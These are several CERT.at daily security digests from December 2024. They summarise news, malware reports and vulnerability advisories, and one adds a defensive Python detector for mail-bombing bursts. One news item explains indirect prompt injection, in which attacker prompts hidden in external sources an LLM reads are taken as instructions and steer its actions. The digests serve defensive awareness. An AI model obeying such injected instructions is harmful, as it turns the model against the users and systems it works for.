Security updates have been issued by Debian (gst-plugins-base1.0, gstreamer1.0, and libpgjava), Fedora (bpftool, chromium, golang-x-crypto, kernel, kernel-headers, linux-firmware, pytest, python3.10, subversion, and thunderbird), Gentoo (NVIDIA Drivers), Oracle (kernel, perl-App-cpanminus:1.7044, php:7.4, php:8.1, php:8.2, postgresql, python3.11, python3.12, python3.9:3.9.21, python36:3.6, ruby, and ruby:2.5), SUSE (docker-stable, firefox-esr, gstreamer, gstreamer-plugins-base, gstreamer-plugins-good, kernel, python-Django, python312, and socat), and Ubuntu (mpmath).
---------------------------------------------
https://lwn.net/Articles/1002338/
∗∗∗ Siemens: SSA-928984 V1.0: Heap-based Buffer Overflow Vulnerability in User Management Component (UMC) ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-928984.html
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 12-12-2024 18:00 − Friday 13-12-2024 18:05
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Social engineering after mail bombing ∗∗∗
---------------------------------------------
Rapid7 recently published a blog post on the modus operandi of a ransomware group, and we have since heard from several companies in Austria that have observed this attack pattern themselves: first, an employee of the target company is flooded with e-mail; in many cases these are legitimate newsletters, which in bulk nevertheless become a real problem. The employee is then contacted via Teams or other channels: the caller claims to be the help desk and offers to help cope with the avalanche of mail.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/12/social-engineering-nach-mailbombing
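The mail-bombing phase is visible in gateway logs well before the fake help-desk call, and it has a distinctive shape: one recipient, many messages, many different senders, short time. The detector below is an added example for this digest, not code from CERT.at or Rapid7. The log format is an assumption (one line per accepted message, "ISO-timestamp to=<rcpt> from=<sender>"), the thresholds are placeholders to tune per organisation, and the sample log is constructed.

```python
"""Detect the mail-bombing phase: an unusual number of inbound messages to one
recipient from many distinct senders inside a short window.

Added example for this digest (not CERT.at's or Rapid7's code). Log format,
thresholds and sample lines are assumptions / constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Tuple

LINE = re.compile(r"^(\S+) to=<([^>]+)> from=<([^>]+)>")
Event = Tuple[datetime, str, str]


def parse_line(line: str) -> Optional[Event]:
    m = LINE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(2).lower(), m.group(3).lower()


def detect_mail_bursts(lines: List[str], window: timedelta = timedelta(minutes=10),
                       threshold: int = 40, min_senders: int = 10) -> Dict[str, Dict[str, int]]:
    """Sliding window per recipient. A burst needs volume AND sender diversity:
    one chatty colleague is not a bombing, dozens of newsletter lists are."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e[0])
    windows: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: Dict[str, Dict[str, int]] = {}
    for ts, rcpt, sender in events:
        q = windows[rcpt]
        q.append((ts, sender))
        while q and ts - q[0][0] > window:
            q.popleft()
        senders = {s for _, s in q}
        if len(q) >= threshold and len(senders) >= min_senders:
            peak = alerts.setdefault(rcpt, {"count": 0, "senders": 0})
            if len(q) > peak["count"]:
                peak["count"], peak["senders"] = len(q), len(senders)
    return alerts


def build_sample_log() -> List[str]:
    """Constructed: alice gets 60 newsletters from 30 lists within 10 minutes;
    bob gets 5 mails from one colleague in the same period."""
    t0 = datetime(2024, 12, 12, 9, 0, 0)
    lines: List[str] = []
    for i in range(60):
        ts = t0 + timedelta(seconds=10 * i)
        lines.append(f"{ts.isoformat()} to=<alice@corp.example> from=<news@list{i % 30}.example>")
    for i in range(5):
        ts = t0 + timedelta(minutes=2 * i)
        lines.append(f"{ts.isoformat()} to=<bob@corp.example> from=<colleague@corp.example>")
    return lines


if __name__ == "__main__":
    for rcpt, info in detect_mail_bursts(build_sample_log()).items():
        print(f"{rcpt}: {info['count']} mails from {info['senders']} senders in the window")
```

The useful action on an alert is not to throttle the mail but to warn the affected user and the real help desk at once: the next step of the playbook is an unsolicited "we are IT, let us help" contact via Teams or phone, and a user who has been told to expect it will not install a remote-access tool on request.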
∗∗∗ Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion ∗∗∗
---------------------------------------------
In this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool, triggering DarkGate malware activities and an attempted C&C connection.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html
∗∗∗ Germany sinkholes BadBox malware pre-loaded on Android devices ∗∗∗
---------------------------------------------
Germany's Federal Office for Information Security (BSI) has disrupted the BadBox malware operation pre-loaded in over 30,000 Android IoT devices sold in the country. [..] Germany's cybersecurity agency says it blocked communication between the BadBox malware devices and their command and control (C2) infrastructure by sinkholing DNS queries so that the malware communicates with police-controlled servers rather than the attacker's command and control servers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/germany-sinkholes-badbox-mal…
∗∗∗ Efforts to Secure US Telcos Beset by Salt Typhoon Might Fall Flat ∗∗∗
---------------------------------------------
The rules necessary to secure US communications have already been in place for 30 years, argues Sen. Wyden, the FCC just hasn't enforced them. It's unclear if they will help.
---------------------------------------------
https://www.darkreading.com/vulnerabilities-threats/efforts-secure-us-telco…
∗∗∗ IoT Cloud Cracked by Open Sesame Over-the-Air Attack ∗∗∗
---------------------------------------------
Researchers demonstrate how to hack Ruijie Reyee access points without Wi-Fi credentials or even physical access to the device.
---------------------------------------------
https://www.darkreading.com/ics-ot-security/iot-cloud-cracked-open-sesame-a…
∗∗∗ Windows Tooling Updates: OleView.NET ∗∗∗
---------------------------------------------
This is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution.
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/12/windows-tooling-updates-olev…
∗∗∗ New Linux Rootkit PUMAKIT Uses Advanced Stealth Techniques to Evade Detection ∗∗∗
---------------------------------------------
Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection.
---------------------------------------------
https://thehackernews.com/2024/12/new-linux-rootkit-pumakit-uses-advanced.h…
∗∗∗ Attacking Entra Metaverse: Part 1 ∗∗∗
---------------------------------------------
This first blog post is a short one, and demonstrates how complete control of an Entra user is equal to compromise of the on-premises user. For the entire blog series the point I am trying to make is this: The Entra Tenant is the trust boundary
---------------------------------------------
https://posts.specterops.io/attacking-entra-metaverse-part-1-c9cf8c4fb4ee?s…
=====================
= Vulnerabilities =
=====================
∗∗∗ DevSecOps platform GitLab: account takeover possible ∗∗∗
---------------------------------------------
In a post, the developers write that the hardened releases are already running on GitLab.com. For self-managed GitLab installations, versions 17.4.6, 17.5.4 and 17.6.2 of the Community Edition and Enterprise Edition have now been released. [..] In total, the developers closed twelve security vulnerabilities. Two of them are rated "high" severity (CVE-2024-11274, CVE-2024-8233). In the first case, attackers can take over accounts by manipulating Kubernetes proxy responses.
---------------------------------------------
https://heise.de/-10198923
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium, pgpool2, and smarty4), Fedora (chromium, linux-firmware, matrix-synapse, open62541, and thunderbird), Red Hat (kernel, kernel-rt, python3.11, python3.12, python3.9:3.9.18, python3.9:3.9.21, and ruby:2.5), SUSE (buildah, chromium, govulncheck-vulndb, java-1_8_0-ibm, libsvn_auth_gnome_keyring-1-0, python310-Django, qemu, and radare2), and Ubuntu (linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oem-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux-gkeop, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, php7.0, php7.2, python-asyncssh, and smarty3).
---------------------------------------------
https://lwn.net/Articles/1002036/
∗∗∗ Schneider Electric Security Advisories 10.12.2024 ∗∗∗
---------------------------------------------
https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.…
∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 115.18 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-70/
∗∗∗ F5: K000148969: Python vulnerability CVE-2024-7592 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148969
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 11-12-2024 18:00 − Thursday 12-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Apache issues patches for critical Struts 2 RCE bug ∗∗∗
---------------------------------------------
More details released after devs allowed weeks to apply fixes. We now know the remote code execution vulnerability in Apache Struts 2 disclosed back in November carries a near-maximum severity rating following the publication of the CVE. [..] Considering remote attackers could exploit the vulnerability without requiring any privileges, combined with the high impact to system confidentiality, integrity, and availability, it's likely the Apache Foundation withheld the juiciest details to allow customers to upgrade to a safe version (Struts 6.4.0 or greater).
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/12/12/apache_strut…
∗∗∗ Cyber Resilience Act: connected products will soon have to be better secured ∗∗∗
---------------------------------------------
The EU regulation on cyber resilience has entered into force. Manufacturers of connected products will in future have to provide a minimum level of cybersecurity.
---------------------------------------------
https://heise.de/-10197273
∗∗∗ Modular Java Backdoor Dropped in Cleo Exploitation Campaign ∗∗∗
---------------------------------------------
While investigating incidents related to Cleo software exploitation, Rapid7 Labs and MDR team discovered a novel, multi-stage attack that deploys an encoded Java Archive (JAR) payload.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/12/11/etr-modular-java-backdoor-dropp…
∗∗∗ The Bite from Inside: The Sophos Active Adversary Report ∗∗∗
---------------------------------------------
A sea change in available data fuels fresh insights from the first half of 2024.
---------------------------------------------
https://news.sophos.com/en-us/2024/12/12/active-adversary-report-2024-12/
∗∗∗ Caution when buying Christmas trees online: how to spot dubious shops ∗∗∗
---------------------------------------------
For many people the pre-Christmas period means stress and high expenses, so a cheap Christmas tree that is quick to set up seems tempting. Foldable Christmas trees that are supposed to be set up in record time are particularly trendy. But beware: not all vendors deliver what they promise. We show how to recognise dubious offers.
---------------------------------------------
https://www.watchlist-internet.at/news/unserioese-shops-beim-weihnachtsbaum…
∗∗∗ 300,000+ Prometheus Servers and Exporters Exposed to DoS Attacks ∗∗∗
---------------------------------------------
In this research we highlighted vulnerabilities and flaws in the Prometheus stack. We highlight the risks associated with exposing Prometheus servers and exporters to the internet without authentication, which expose sensitive information and can be exploited to launch DoS attacks or even execute arbitrary code through compromised exporters.
---------------------------------------------
https://blog.aquasec.com/300000-prometheus-servers-and-exporters-exposed-to…
∗∗∗ To the point of burnout: open-source developers annoyed by AI bug reports ∗∗∗
---------------------------------------------
They come across as friendly and well thought out, but on closer inspection open-source maintainers find that more and more bug reports are AI-generated nonsense.
---------------------------------------------
https://heise.de/-10195951
=====================
= Vulnerabilities =
=====================
∗∗∗ Hunk Companion WordPress plugin exploited to install vulnerable plugins ∗∗∗
---------------------------------------------
The issue impacts all versions of Hunk Companion before the latest 1.9.0, released yesterday, which addressed the problem. While investigating a WordPress site infection, WPScan discovered active exploitation of CVE-2024-11972 to install a vulnerable version of WP Query Console. [..] By installing outdated plugins with known vulnerabilities with available exploits, the attackers can access a large pool of flaws that lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS) flaws, or create backdoor admin accounts.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plu…
∗∗∗ Apple Updates Everything (iOS, iPadOS, macOS, watchOS, tvOS, visionOS), (Wed, Dec 11th) ∗∗∗
---------------------------------------------
Apple today released patches for all of its operating systems. The updates address 46 different vulnerabilities. Many of the vulnerabilities affect more than one operating system. None of the vulnerabilities are labeled as being already exploited.
---------------------------------------------
https://isc.sans.edu/diary/rss/31514
∗∗∗ Atlassian protects Confluence & Co. against possible DoS attacks ∗∗∗
---------------------------------------------
Attackers can exploit ten security vulnerabilities in Atlassian Bamboo, Bitbucket and Confluence and, among other things, cause crashes.
---------------------------------------------
https://heise.de/-10196643
∗∗∗ Security patch: attackers can delete Windows files via TeamViewer vulnerability ∗∗∗
---------------------------------------------
According to an advisory, the TeamViewer Patch & Asset Management component is vulnerable (CVE-2024-12363, "high"). The component is not installed by default, however; it can optionally be installed in the context of the remote-management feature. [..] The developers assure that the security update installs automatically.
---------------------------------------------
https://heise.de/-10196765
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libsoup2.4, python-aiohttp, and upx-ucl), Fedora (iaito, python3.11, python3.9, and radare2), Red Hat (ruby, ruby:2.5, and ruby:3.1), Slackware (mozilla-thunderbird), SUSE (govulncheck-vulndb, nodejs18, nodejs20, and socat), and Ubuntu (ofono and python-tornado).
---------------------------------------------
https://lwn.net/Articles/1001863/
∗∗∗ Paloalto: PAN-SA-2024-0017 Chromium: Monthly Vulnerability Updates (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/PAN-SA-2024-0017
∗∗∗ Tenable: [R1] Security Center Version 6.5.1 Fixes Multiple Vulnerabilities ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2024-20
∗∗∗ Drupal: Open Social - Moderately critical - Access bypass - SA-CONTRIB-2024-076 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-076
∗∗∗ Drupal: Allow All File Extensions for file fields - Critical - Unsupported - SA-CONTRIB-2024-075 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-075
∗∗∗ Drupal: Git Utilities for Drupal - Critical - Unsupported - SA-CONTRIB-2024-074 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-074
∗∗∗ Drupal: Login Disable - Critical - Access bypass - SA-CONTRIB-2024-073 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-073
∗∗∗ Drupal: Browser Back Button - Moderately critical - Cross site scripting - SA-CONTRIB-2024-072 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-072
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 10-12-2024 18:00 − Wednesday 11-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Global Ongoing Phishing Campaign Targets Employees Across 12 Industries ∗∗∗
---------------------------------------------
Cybersecurity researchers at Group-IB have exposed an ongoing phishing operation that has been targeting employees and associates from over 30 companies across 12 industries and 15 jurisdictions. [..] What makes this campaign dangerous is the use of advanced techniques designed to bypass Secure Email Gateways (SEGs) and evade detection. [..] This campaign is ongoing; therefore, companies need to watch out for what comes to their inbox.
---------------------------------------------
https://hackread.com/ongoing-phishing-campaign-targets-employees/
∗∗∗ AMD’s trusted execution environment blown wide open by new BadRAM attack ∗∗∗
---------------------------------------------
On Tuesday, an international team of researchers unveiled BadRAM, a proof-of-concept attack that completely undermines security assurances that chipmaker AMD makes to users of one of its most expensive and well-fortified microprocessor product lines. Starting with the AMD Epyc 7003 processor, a feature known as SEV-SNP—short for Secure Encrypted Virtualization and Secure Nested Paging—has provided the cryptographic means for certifying that a VM hasn’t been compromised by any sort of backdoor installed by someone with access to the physical machine running it.
---------------------------------------------
https://arstechnica.com/information-technology/2024/12/new-badram-attack-ne…
∗∗∗ Microsoft MFA AuthQuake Flaw Enabled Unlimited Brute-Force Attempts Without Alerts ∗∗∗
---------------------------------------------
Cybersecurity researchers have flagged a "critical" security vulnerability in Microsoft's multi-factor authentication (MFA) implementation that allows an attacker to trivially sidestep the protection and gain unauthorized access to a victim's account. [..] Following responsible disclosure, the issue – codenamed AuthQuake – was addressed by Microsoft in October 2024.
---------------------------------------------
https://thehackernews.com/2024/12/microsoft-mfa-authquake-flaw-enabled.html
∗∗∗ Decrypting Full Disk Encryption with Dissect ∗∗∗
---------------------------------------------
Back in 2022 Fox-IT decided to open source its proprietary incident response tooling known as Dissect. [..] One of the most popular requests has been the capability to use Dissect in combination with common disk encryption methods like Microsoft’s BitLocker or its Linux equivalent LUKS. Internally at Fox-IT we were able to already use these capabilities. With the release of Dissect version 3.17 these capabilities are now also available to the community at large.
---------------------------------------------
https://blog.fox-it.com/2024/12/11/decrypting-full-disk-encryption-with-dis…
∗∗∗ The Stealthy Stalker: Remcos RAT ∗∗∗
---------------------------------------------
As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants.
---------------------------------------------
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-stealthy-stalker-r…
∗∗∗ How easily access cards can be cloned and why your PACS might be vulnerable ∗∗∗
---------------------------------------------
PACS can be bad, but also good if you configure them right. These systems protect your building, and control access to your most sensitive systems. Give them some love.
---------------------------------------------
https://www.pentestpartners.com/security-blog/how-easily-access-cards-can-b…
∗∗∗ Schedule published: Let's Encrypt is dropping OCSP certificate checking ∗∗∗
---------------------------------------------
The protocol for real-time validity checking has privacy problems. The world's largest CA is now replacing it with certificate revocation lists.
---------------------------------------------
https://heise.de/-10195107
=====================
= Vulnerabilities =
=====================
∗∗∗ Ivanti: December Security Update ∗∗∗
---------------------------------------------
Today, fixes have been released for the Ivanti solutions detailed below. [..] Ivanti Cloud Service Application, Ivanti Desktop and Server Management (DSM), Ivanti Connect Secure and Policy Secure, Ivanti Sentry, Ivanti Patch SDK, Ivanti Application Control, Ivanti Automation, Ivanti Workspace Control, Ivanti Performance Manager, Ivanti Security Controls (iSec) [..] Ivanti Cloud Services Application (CSA) 10.0 (Critical): An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access. CVE-2024-11639
---------------------------------------------
https://www.ivanti.com/blog/december-security-update
∗∗∗ Microsoft Security Update Summary (10 December 2024) ∗∗∗
---------------------------------------------
On 10 December 2024, Microsoft released security updates for Windows clients and servers, for Office, and for other products. The security updates fix 70 vulnerabilities (CVEs), 16 of them rated critical, one of which is classified as a 0-day (already exploited).
---------------------------------------------
https://www.borncity.com/blog/2024/12/10/microsoft-security-update-summary-…
∗∗∗ SolarWinds Web Help Desk: software update closes critical vulnerabilities ∗∗∗
---------------------------------------------
The developers have fixed security vulnerabilities, some of them critical, in SolarWinds Web Help Desk. IT administrators should update promptly.
---------------------------------------------
https://heise.de/-10195207
∗∗∗ Patch day: Adobe closes more than 160 security vulnerabilities in Acrobat and other products ∗∗∗
---------------------------------------------
In total, the software vendor has closed more than 160 vulnerabilities with updates for its products.
---------------------------------------------
https://www.heise.de/-10194979
∗∗∗ Synology-SA-24:28 Media Server ∗∗∗
---------------------------------------------
A vulnerability allows remote attackers to read specific files.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_28
∗∗∗ PDQ Deploy allows reuse of deleted credentials that can compromise a device and facilitate lateral movement ∗∗∗
---------------------------------------------
The CERT/CC is creating this Vulnerability Note to advise and make users of PDQ Deploy aware of potential avenues of attack through the deploy service. System administrators that are using PDQ Deploy should employ LAPS to mitigate this vulnerability.
---------------------------------------------
https://kb.cert.org/vuls/id/164934
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (proftpd-dfsg and smarty3), Fedora (python3.14), Gentoo (Distrobox, eza, idna, libvirt, and OpenSC), Red Hat (container-tools:rhel8 and edk2), SUSE (avahi, curl, libsoup2, lxd, nodejs20, python-Django, python310-Django4, python312, squid, and webkit2gtk3), and Ubuntu (expat, intel-microcode, linux, linux-aws, linux-kvm, linux-lts-xenial, and shiro).
---------------------------------------------
https://lwn.net/Articles/1001728/
∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 128.5.2 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-69/
∗∗∗ F5: K000148931: Linux kernel vulnerability CVE-2024-26923 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148931
∗∗∗ Huawei: Security Advisory - Path Traversal Vulnerability in Huawei Home Music System ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-ptvihhms-…
∗∗∗ Numerix: Reflected Cross-Site Scripting in Numerix License Server Administration System Login ∗∗∗
---------------------------------------------
https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scr…
∗∗∗ Splunk: SVD-2024-1207: Third-Party Package Updates in Splunk Universal Forwarder - December 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1207
∗∗∗ Splunk: SVD-2024-1206: Third-Party Package Updates in Splunk Enterprise - December 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1206
∗∗∗ Splunk: SVD-2024-1205: Remote Code Execution through Deserialization of Untrusted Data in Splunk Secure Gateway app ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1205
∗∗∗ Splunk: SVD-2024-1204: Sensitive Information Disclosure through SPL commands ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1204
∗∗∗ Splunk: SVD-2024-1203: Information Disclosure due to Username Collision with a Role that has the same Name as the User ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1203
∗∗∗ Splunk: SVD-2024-1202: Risky command safeguards bypass in “/en-US/app/search/report“ endpoint through “s“ parameter ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1202
∗∗∗ Splunk: SVD-2024-1201: Information Disclosure in Mobile Alert Responses in Splunk Secure Gateway ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1201
=====================
= End-of-Day report =
=====================
Timeframe: Monday 09-12-2024 18:00 − Tuesday 10-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Brute-force attacks on exposed systems ∗∗∗
---------------------------------------------
The BSI is currently receiving an increased number of reports of brute-force attacks against Citrix NetScaler Gateways from various KRITIS (critical infrastructure) sectors and from international partners. [..] The current attacks stand out from the usual attacks of this kind only in their reported volume. [..] Although current reports name Citrix Gateways as the target of the brute-force attacks, this cyber security warning is relevant to all exposed systems, especially VPN gateways.
---------------------------------------------
https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-2…
∗∗∗ Sharp rise in Microsoft Remote Desktop Protocol (RDP) scanning ∗∗∗
---------------------------------------------
Since the beginning of December, an international partner (Shadowserver) has recorded a very sharp worldwide increase (x160) in RDP "scanning", arriving in waves [1]. Whether this is only reconnaissance of open RDP ports or whether further actions are already being taken is currently unknown. The focus appears to be not on the RDP default port 3389 but on port 1098.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/12/stark-gestiegenes-aufkommen-an-mic…
∗∗∗ Microsoft takes measures against NTLM relay attacks ∗∗∗
---------------------------------------------
One attack vector for gaining access within a network is so-called NTLM relaying. Microsoft is now making this harder with new measures.
---------------------------------------------
https://heise.de/-10194220
∗∗∗ Ultralytics PyPI Package Compromised Through GitHub Actions Cache Poisoning ∗∗∗
---------------------------------------------
Over the weekend, the popular Ultralytics PyPI package was compromised in a supply chain attack that was detected following reports of a discrepancy between the library’s code on GitHub and the code that was published to PyPI for v8.3.41.
---------------------------------------------
https://socket.dev/blog/ultralytics-pypi-package-compromised-through-github…
∗∗∗ Malware trends: eBPF exploitation, malware configurations stored in unexpected places, and increased use of custom post-exploitation tools ∗∗∗
---------------------------------------------
An investigation into an information security incident has allowed virus analysts at Doctor Web to uncover an ongoing campaign that incorporates many modern trends employed by cybercriminals. A client approached Doctor Web after suspecting that their computer infrastructure had been compromised. While analyzing the client’s data, our virus analysts identified a number of similar cases, leading them to conclude that an active campaign was underway.
---------------------------------------------
https://news.drweb.com/show/?i=14955&lng=en&c=9
∗∗∗ When User Input Lines Are Blurred: Indirect Prompt Injection Attack Vulnerabilities in AI LLMs ∗∗∗
---------------------------------------------
Indirect prompt attacks are when an LLM takes input from external sources but where an attacker gets to smuggle payloads (additional prompts!) into these external/side sources. These malicious additional prompts modify the overall prompt, breaking out of the data context as they are treated as instructions (they are additional prompts, commands, if you will) and, in turn, influence the initial user prompt provided together with the system prompt and with that, the subsequent actions and output.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-user-i…
∗∗∗ Inside Zloader’s Latest Trick: DNS Tunneling ∗∗∗
---------------------------------------------
Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based on the leaked Zeus source code that emerged in 2015. The malware was originally designed to facilitate banking fraud via Automated Clearing House (ACH) and wire transfers. However, similar to other malware families like Qakbot and Trickbot, Zloader has been repurposed for initial access, providing an entry point into corporate environments for the deployment of ransomware.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/inside-zloader-s-latest-tri…
∗∗∗ Going to the theatre with your Bumble date? Beware of fraud! ∗∗∗
---------------------------------------------
Met someone on Bumble? You get along well and want to go to the theatre for a first date? But you are supposed to buy your own ticket on an unfamiliar platform. Beware: behind the supposedly perfect match are criminals luring you into a fake shop.
---------------------------------------------
https://www.watchlist-internet.at/news/mit-dem-bumble-date-ins-theater-vors…
∗∗∗ Study together with the BSI: IT security of smart radiator thermostats ∗∗∗
---------------------------------------------
Certitude carried out the technical security assessment of smart radiator thermostats on behalf of the German Federal Office for Information Security (BSI). The study resulting from this project, published today, shows that there is room for improvement, particularly in how vulnerabilities are handled.
---------------------------------------------
https://certitude.consulting/blog/de/bsi-studie-sicherheit-smarte-heizkorpe…
∗∗∗ Full-Face Masks to Frustrate Identification ∗∗∗
---------------------------------------------
It’s a video of someone trying on a variety of printed full-face masks. They won’t fool anyone for long, but will survive casual scrutiny. And they’re cheap and easy to swap.
---------------------------------------------
https://www.schneier.com/blog/archives/2024/12/full-face-masks-to-frustrate…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cleo transfer software: put it behind a firewall, patch ineffective ∗∗∗
---------------------------------------------
Cleo's data transfer software had patched a security vulnerability, but inadequately. The vulnerability is being actively attacked.
---------------------------------------------
https://heise.de/-10193961
∗∗∗ WordPress: WPForms plug-in opens a security hole in 6 million websites ∗∗∗
---------------------------------------------
In the WordPress plug-in WPForms, attackers can abuse a vulnerability to, for example, reverse payments. Six million websites use the plug-in.
---------------------------------------------
https://heise.de/-10193387
∗∗∗ MC LR Router and GoCast unpatched vulnerabilities ∗∗∗
---------------------------------------------
Cisco Talos' Vulnerability Research team recently discovered two vulnerabilities in the MC Technologies LR Router and three vulnerabilities in the GoCast service. These vulnerabilities have not been patched at the time of this posting.
---------------------------------------------
https://blog.talosintelligence.com/mc-lr-router-and-gocast-zero-day-vulnera…
∗∗∗ SAP patch day: updates close security vulnerabilities, some of them critical ∗∗∗
---------------------------------------------
In December, SAP reports nine newly discovered security vulnerabilities in various products. One of them is considered a critical risk.
---------------------------------------------
https://heise.de/-10193418
∗∗∗ Security vulnerability in Logitech MX Keys for Business (SYSS-2024-084) ∗∗∗
---------------------------------------------
SySS GmbH is currently not aware of a security fix for the described issue. [..] Because the keyboard does not enforce any sort of authentication during pairing, MX Keys for Business is vulnerable to machine-in-the-middle (MitM) attacks.
---------------------------------------------
https://www.syss.de/pentest-blog/sicherheitsschwachstelle-in-logitech-mx-ke…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (postgresql:15, postgresql:16, and ruby:3.1), Debian (jinja2), Fedora (python-multipart, python-python-multipart, python3.12, retsnoop, rust-rbspy, rust-rustls, and zabbix), Oracle (kernel, libsoup, postgresql:12, postgresql:13, postgresql:15, postgresql:16, redis:7, and ruby:3.1), SUSE (nodejs18, pam, qt6-webengine, and radare2), and Ubuntu (dogtag-pki, linux-intel-iotg, linux-intel-iotg-5.15, ofono, rabbitmq-server, and webkit2gtk).
---------------------------------------------
https://lwn.net/Articles/1001597/
∗∗∗ MOBATIME Network Master Clock ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-01
∗∗∗ Horner Automation Cscape ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-05
∗∗∗ Rockwell Automation Arena ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-06
∗∗∗ National Instruments LabVIEW ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-04
∗∗∗ Milesight UG67 Outdoor LoRaWAN Gateway rt-sa-2024-001 - rt-sa-2024-005 ∗∗∗
---------------------------------------------
https://www.redteam-pentesting.de/en/advisories/
∗∗∗ SSA-979056 V1.0: Out of Bounds Write Vulnerability in Parasolid ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-979056.html
∗∗∗ SSA-881356 V1.0: Multiple Memory Corruption Vulnerabilities in Simcenter Femap ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-881356.html
∗∗∗ SSA-800126 V1.0: Deserialization Vulnerability in Siemens Engineering Platforms before V20 ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-800126.html
∗∗∗ SSA-730188 V1.0: Multiple File Parsing Vulnerabilities in Solid Edge V2024 ∗∗∗
---------------------------------------------
